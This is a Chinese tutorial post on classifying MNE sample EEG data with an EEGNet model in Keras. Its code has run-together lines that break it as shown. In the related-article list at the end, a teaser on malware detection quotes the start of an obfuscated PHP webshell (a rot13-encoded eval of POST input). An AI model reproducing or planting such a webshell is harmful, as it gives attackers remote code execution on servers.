基于MNE的EEGNet 神经网络的脑电信号分类实战(附完整源码)

利用MNE中的EEG数据,进行EEGNet神经网络的脑电信号分类实现:

代码:

代码主要包括一下几个步骤:
1)从MNE中加载脑电信号,并进行相应的预处理操作,得到训练集、验证集以及测试集,每个集中都包括数据和标签;
2)基于tensorflow构建EEGNet网络模型;
3)编译模型,配置损失函数、优化器和评估指标等,并进行模型训练和预测;
4)绘制训练集和验证集的损失曲线以及训练集和验证集的准确度曲线。
代码如下:

import mne
import os
from pathlib import Path
import numpy as np
from keras.src.utils import np_utilsfrom mne import io
from mne.datasets import sample
import matplotlib.pyplot as plt
import pathlibfrom keras.models import Model
from keras.layers import Dense, Activation, Permute, Dropout
from keras.layers import Conv2D, MaxPooling2D, AveragePooling2D
from keras.layers import SeparableConv2D, DepthwiseConv2D
from keras.layers import BatchNormalization
from keras.layers import SpatialDropout2D
from keras.regularizers import l1_l2
from keras.layers import Input, Flatten
from keras.constraints import max_norm
from keras import backend as K
from keras.src.callbacks import ModelCheckpointfrom sklearn.pipeline import make_pipeline
from sklearn.linear_model import LogisticRegressiondef EEGNet(nb_classes, Chans=64, Samples=128,dropoutRate=0.5, kernelLength=64,F1=8, D=2, F2=16, norm_rate=0.25,dropout_type='Dropout'):"""EEGNet模型的实现。参数:- nb_classes: int, 输出类别的数量。- Chans: int, 通道数,默认为64。- Samples: int, 每个通道的样本数,默认为128。- dropoutRate: float, Dropout率,默认为0.5。- kernelLength: int, 卷积核的长度,默认为64。- F1: int, 第一个卷积层的滤波器数量,默认为8。- D: int, 深度乘法器,默认为2。- F2: int, 第二个卷积层的滤波器数量,默认为16。- norm_rate: float, 权重范数约束,默认为0.25。- dropout_type: str, Dropout类型,默认为'Dropout'。返回:- Model: Keras模型对象。"""# 根据dropout_type参数确定使用哪种Dropout方式if dropout_type == 'SpatialDropout2D':dropoutType = SpatialDropout2Delif dropout_type == 'Dropout':dropoutType = Dropoutelse:raise ValueError('dropout_type must be one of SpatialDropout2D ''or Dropout, passed as a string.')# 定义模型的输入层input1 = Input(shape=(Chans, Samples, 1))# 第一个卷积块block1 = Conv2D(F1, (1, kernelLength), padding='same',input_shape=(Chans, Samples, 1),use_bias=False)(input1)block1 = BatchNormalization()(block1)block1 = DepthwiseConv2D((Chans, 1), use_bias=False,depth_multiplier=D,depthwise_constraint=max_norm(1.))(block1)block1 = BatchNormalization()(block1)block1 = Activation('elu')(block1)block1 = AveragePooling2D((1, 4))(block1)block1 = dropoutType(dropoutRate)(block1)# 第二个卷积块block2 = SeparableConv2D(F2, (1, 16),use_bias=False, padding='same')(block1)block2 = BatchNormalization()(block2)block2 = Activation('elu')(block2)block2 = AveragePooling2D((1, 8))(block2)block2 = dropoutType(dropoutRate)(block2)# 将卷积块的输出展平以便输入到全连接层flatten = Flatten(name='flatten')(block2)# 定义全连接层dense = Dense(nb_classes, name='dense', kernel_constraint=max_norm(norm_rate))(flatten)softmax = Activation('softmax', name='softmax')(dense)# 创建并返回模型return Model(inputs=input1, outputs=softmax)def get_data4EEGNet(kernels, chans, samples):"""为EEGNet模型准备数据。该函数从指定的文件路径中读取原始EEG数据和事件数据,进行预处理,包括滤波、选择通道、分割数据集,并将数据集按给定的通道、核数和样本数进行重塑。参数:kernels - 数据集中的核数量。chans - 数据集中的通道数量。samples - 数据集中的样本数量。返回:X_train, X_validate, X_test, y_train, y_validate, y_test - 分别是训练、验证和测试数据集,以及相应的标签。"""# 设置图像数据格式,确保数据维度顺序正确K.set_image_data_format('channels_last')# 定义数据路径data_path = Path("C:\\Users\\72671\\mne_data\\MNE-sample-data")# 定义原始数据和事件数据的文件路径raw_fname = os.path.join(data_path, "MEG", "sample", "sample_audvis_filt-0-40_raw.fif")event_fname = os.path.join(data_path, "MEG", "sample", "sample_audvis_filt-0-40_raw-eve.fif")# 定义时间范围和事件IDtmin, tmax = -0., 1event_id = dict(aud_l=1, aud_r=2, vis_l=3, vis_r=4)# 读取并预处理原始数据raw = io.Raw(raw_fname, preload=True, verbose=False)raw.filter(2, None, method='iir')events = mne.read_events(event_fname)# 设置无效通道并选择所需通道类型raw.info['bads'] = ['MEG 2443']picks = mne.pick_types(raw.info, meg=False, eeg=True, stim=False, eog=False,exclude='bads')# 创建epochs数据集epochs = mne.Epochs(raw, events, event_id, tmin, tmax, proj=False, picks=picks, baseline=None,preload=True, verbose=False)labels = epochs.events[:, -1]# 获取数据并进行缩放X = epochs.get_data(copy=False) * 1e6y = labels# 分割数据集为训练、验证和测试集X_train = X[0:144, ]y_train = y[0:144]X_validate = X[144:216, ]y_validate = y[144:216]X_test = X[216:, ]y_test = y[216:]# 将训练、验证和测试数据集中的标签转换为one-hot编码# 减1是因为标签通常从1开始计数,而one-hot编码需要从0开始y_train = np_utils.to_categorical(y_train-1)y_validate = np_utils.to_categorical(y_validate-1)y_test = np_utils.to_categorical(y_test-1)# 重塑数据集以匹配EEGNet模型的输入要求X_train = X_train.reshape(X_train.shape[0], chans, samples, kernels)X_validate = X_validate.reshape(X_validate.shape[0], chans, samples, kernels)X_test = X_test.reshape(X_test.shape[0], chans, samples, kernels)# 返回准备好的数据集return X_train, X_validate, X_test, y_train, y_validate, y_test#########################################################################
# 定义模型参数
kernels, chans, samples = 1, 60, 151
# 获取预处理后的EEG数据集
X_train, X_validate, X_test, y_train, y_validate, y_test = get_data4EEGNet(kernels, chans, samples)# 初始化EEGNet模型
model = EEGNet(nb_classes=4, Chans=chans, Samples=samples, dropoutRate=0.5,kernelLength=32, F1=8, D=2, F2=16, dropout_type='Dropout')# 编译模型,配置损失函数、优化器和评估指标
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])# 设置模型检查点以保存最佳模型
checkpointer = ModelCheckpoint(filepath='./models/EEGNet_best_model.h5', verbose=1, save_best_only=True)
# 定义类别权重
class_weights = {0: 1, 1: 1, 2: 1, 3: 1}# 训练模型
fittedModel = model.fit(X_train, y_train, batch_size=32, epochs=500, verbose=2,validation_data=(X_validate, y_validate),callbacks=[checkpointer], class_weight=class_weights)# 加载最佳模型权重
model.load_weights('./models/EEGNet_best_model.h5')# 对测试集进行预测
probs = model.predict(X_test)
# 获取预测标签
preds = probs.argmax(axis=-1)
# 计算分类准确率
acc = np.mean(preds == y_test.argmax(axis=-1))# 输出分类准确率
print("Classification accuracy: %f " % (acc))# 获取训练历史
history = fittedModel.history# 绘制训练集和验证集的损失曲线
plt.figure(figsize=(12, 4))
plt.subplot(1, 2, 1)
plt.plot(history['loss'], label='Training Loss')
plt.plot(history['val_loss'], label='Validation Loss')
plt.title('Loss Curves')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend()# 绘制训练集和验证集的准确度曲线
plt.subplot(1, 2, 2)
plt.plot(history['accuracy'], label='Training Accuracy')
plt.plot(history['val_accuracy'], label='Validation Accuracy')
plt.title('Accuracy Curves')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.legend()plt.tight_layout()
plt.show()

效果如下:

在这里插入图片描述

参考资料:

论文链接: EEGNet: a compact convolutional neural network for EEG-based brain–computer interfaces(Journal of Neural Engineering,SCI JCR2,Impact Factor:4.141)
Github链接: the Army Research Laboratory (ARL) EEGModels project

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/890012.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

CAD学习 day3

细节问题 快捷键X 分解单独进行操作如果需要制定字体样式选择 gdcbig.shx快捷键AA 算面积 平面布置图 客户沟通 - 会面笔记 - 客户需求(几个人居住、生活方式、功能需求(电竞房、家政柜)、书房、佛龛、儿童房、风格方向)根据客户需求 - 平面方案布置 (建议做三个以上方案) -…

LM芯片学习

1、LM7805稳压器 https://zhuanlan.zhihu.com/p/626577102?utm_campaignshareopn&utm_mediumsocial&utm_psn1852815231102873600&utm_sourcewechat_sessionhttps://zhuanlan.zhihu.com/p/626577102?utm_campaignshareopn&utm_mediumsocial&utm_psn18528…

Nginx - 负载均衡及其配置(Balance)

一、概述 定义:在多个计算机(计算机集群)、网络连接、CPU、磁盘驱动器或其他资源中分配负载目标:最佳化资源使用、最大化吞吐率、最小化响应时间、避免过载功能:使用多台服务器提供单一服务(服务器农场&am…

2025山东科技大学考研专业课复习资料一览

[冲刺]2025年山东科技大学020200应用经济学《814经济学之西方经济学[宏观部分]》考研学霸狂刷870题[简答论述计算题]1小时前[强化]2025年山东科技大学085600材料与化工《817物理化学》考研强化检测5套卷22小时前[冲刺]2025年山东科技大学030100法学《704综合一[法理学、国际法学…

C++20之requires

目录 概述requires 基础用法简单要求:检查成员函数和成员变量类型要求:检查类型成员和类型兼容性复合要求:多个约束组合限制表达式不抛出异常嵌套要求:细化约束条件可变参数模板中的 requires 总结与优化 概述 在 C20 中&#xf…

vue自定义颜色选择器(重置版)

实现效果 相较于上次发布的颜色选择器&#xff0c;这次加入了圆形的选择器&#xff0c;并且优化了代码。 <SquareColor ref"squareColor" :color"color" change"changeColor1" />setColor1() {// this.color rgba(255, 82, 111, 0.5)thi…

timestamp 时间戳转换成日期的方法 | java.util

时间戳通常是一个long数据&#xff08;注意java中赋值时需要带上L标识是long整型&#xff0c;否则int过长报错&#xff09; 代码实现 常用工具类&#xff1a; java.util.Datejava.time.Instantjava.time.format.DateTimeFormatter toInstant() 方法的功能是将一个 Date 对象…

Minio入门搭建图片服务器

Minio入门搭建图片服务器 闲来无事&#xff0c;之前一直想弄弄图片服务器的软件&#xff0c;搜索了一下有zimg、Nginx、Thumbor、Minio等。想想之前也用过minio&#xff0c;所以就用这个搭建啦。 1. docker安装 docker run -d -p 9000:9000 -p 9001:9001 \ …

从腾讯云的恶意文件查杀学习下PHP的eval函数

问题来自于腾讯云的主机安全通知&#xff1a; &#x1f680;一键接入&#xff0c;畅享GPT及AI大模型服务&#xff01;【顶级API中转品牌】&#xff1a; https://api.ablai.top/ 病毒文件副本内容如下&#xff1a; <?php function x($x){eval($x);}x(str_rot13(riny($_CBF…

CISC RISC

CISC&#xff1a;设计目标是通过复杂的指令来提高代码密度&#xff0c;减少指令数量&#xff0c;适合内存资源较为有限的系统。CISC处理器的硬件复杂度较高&#xff0c;但在某些应用场合&#xff08;如桌面计算机&#xff09;能够提供足够的性能。 RISC&#xff1a;设计目标是…

ArcGIS地理空间平台manager存在任意文件读取漏洞

免责声明: 本文旨在提供有关特定漏洞的深入信息,帮助用户充分了解潜在的安全风险。发布此信息的目的在于提升网络安全意识和推动技术进步,未经授权访问系统、网络或应用程序,可能会导致法律责任或严重后果。因此,作者不对读者基于本文内容所采取的任何行为承担责任。读者在…

使用LSTM神经网络对股票日线行情进行回归训练(Pytorch版)

版权声明&#xff1a;本文为博主原创文章&#xff0c;如需转载请贴上原博文链接&#xff1a;使用LSTM神经网络对股票日线行情进行回归训练&#xff08;Pytorch版&#xff09;-CSDN博客 前言&#xff1a;近期在尝试使用lstm对股票日线数据进行拟合&#xff0c;初见成型但是效果不…

睡岗和玩手机数据集,4653张原始图,支持YOLO,VOC XML,COCO JSON格式的标注

睡岗和玩手机数据集&#xff0c;4653张原始图&#xff0c;支持YOLO&#xff0c;VOC XML&#xff0c;COCO JSON格式的标注 数据集分割 训练组70&#xff05; 3257图片 有效集20&#xff05; 931图片 测试集10&#xff05; 465图片 预处理 没有采用任何预处…

Pandas 索引

在 Pandas 中&#xff0c;索引&#xff08;Index&#xff09;是 DataFrame 和 Series 的核心组成部分&#xff0c;用于标识和访问数据。索引提供了快速、灵活和强大的数据检索方法。以下是关于 Pandas 索引的一些关键点&#xff1a; 1. 创建索引 当创建一个 DataFrame 或 Seri…

Flink是什么?Flink技术介绍

官方参考资料&#xff1a;Apache Flink — Stateful Computations over Data Streams | Apache Flink Flink是一个分布式流处理和批处理计算框架&#xff0c;具有高性能、容错性和灵活性。以下是关于Flink技术的详细介绍&#xff1a; 一、Flink概述 ‌定义‌&#xff1a;Fli…

labml.ai Deep Learning Paper Implementations (带注释的 PyTorch 版论文实现)

labml.ai Deep Learning Paper Implementations {带注释的 PyTorch 版论文实现} 1. labml.ai2. labml.ai Deep Learning Paper Implementations3. Sampling Techniques for Language Models (语言模型的采样技术)4. Multi-Headed Attention (MHA)References 1. labml.ai https…

使用 Marp 将 Markdown 导出为 PPT 后不可编辑的原因说明及解决方案

Marp 是一个流行的 Markdown 演示文稿工具&#xff0c;能够将 Markdown 文件转换为 PPTX 格式。然而&#xff0c;用户在使用 Marp 导出 PPT 时&#xff0c;可能会遇到以下问题&#xff1a; 导出 PPT 不可直接编辑的原因 根据 Marp GitHub 讨论&#xff0c;Marp 导出的 PPTX 文…

构建一个rust生产应用读书笔记四(实战2)

此门课程学习采用actix-web框架完成一个生产级别的rust应用&#xff0c;在 actix-web 中&#xff0c;Extractors 是一个非常重要的概念&#xff0c;它们用于从传入的 HTTP 请求中提取特定的信息片段。actix-web 提供了多种内置的提取器&#xff0c;以满足常见的使用场景。说白了…

优选生产报工系统:关键选择要素

【优选生产报工系统&#xff1a;数据分析、产品管理与基础数据登录的关键选择要素】 在快速变化的制造业环境中&#xff0c;生产报工系统的重要性不言而喻。它不仅仅是一种记录工时和监控生产进度的工具&#xff0c;更是一种能够实现数据驱动决策、优化产品管理和确保基础数据…

使用Python打造高效的PDF文件管理应用(合并以及分割)

在日常工作和学习中&#xff0c;我们经常需要处理大量PDF文件。手动合并、分割PDF不仅耗时&#xff0c;还容易出错。今天&#xff0c;我们将使用Python的wxPython和PyMuPDF库&#xff0c;开发一个强大且易用的PDF文件管理工具。 C:\pythoncode\new\mergeAndsplitPdf.py 所有代…